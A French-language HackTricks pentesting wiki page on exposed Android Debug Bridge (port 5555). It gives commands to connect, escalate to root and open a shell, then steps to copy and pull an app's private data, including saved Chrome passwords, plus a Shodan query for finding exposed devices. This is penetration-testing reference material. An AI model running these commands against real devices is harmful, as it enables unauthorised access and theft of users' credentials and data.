hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4.1 KiB

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Informations de base

D'après la documentation:

Android Debug Bridge (adb) est un outil de ligne de commande polyvalent qui vous permet de communiquer avec un appareil. La commande adb facilite une variété d'actions sur l'appareil, telles que l'installation et le débogage d'applications, et elle fournit un accès à un shell Unix que vous pouvez utiliser pour exécuter une variété de commandes sur un appareil.

Port par défaut : 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Si vous trouvez le service ADB en cours d'exécution sur un port d'un appareil et que vous pouvez vous y connecter, vous pouvez obtenir un shell à l'intérieur du système :

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Pour plus de commandes ADB, consultez la page suivante :

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump des données de l'application

Pour télécharger complètement les données d'une application, vous pouvez :

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Vous pouvez utiliser cette astuce pour récupérer des informations sensibles comme les mots de passe Chrome. Pour plus d'informations à ce sujet, consultez les informations et les références fournies ici.

Shodan

  • android debug bridge

{% hint style="success" %} Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks
{% endhint %}